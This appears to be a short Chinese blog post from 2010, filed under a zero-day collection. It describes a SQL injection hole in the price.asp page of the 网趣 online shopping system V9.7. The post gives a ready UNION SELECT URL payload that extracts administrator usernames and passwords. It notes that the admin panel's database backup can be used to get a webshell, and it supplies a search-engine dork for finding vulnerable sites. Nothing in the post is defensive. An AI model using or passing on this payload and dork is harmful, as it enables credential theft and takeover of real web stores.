网趣网上购物系统时尚版V9.7注入漏洞--price.asp

2010, August 12, 8:28 AM. oday收藏
Submitted by admin

利用:
price.asp?anid=36%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww
用工具添加表名->cnhww,字段->admin、passwrod
后台可以备份数据库,前台结合可以轻松拿Webshell。
百度、谷歌搜索利用关键字:
inurl:Price.asp?anid=

Tags: 网趣

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):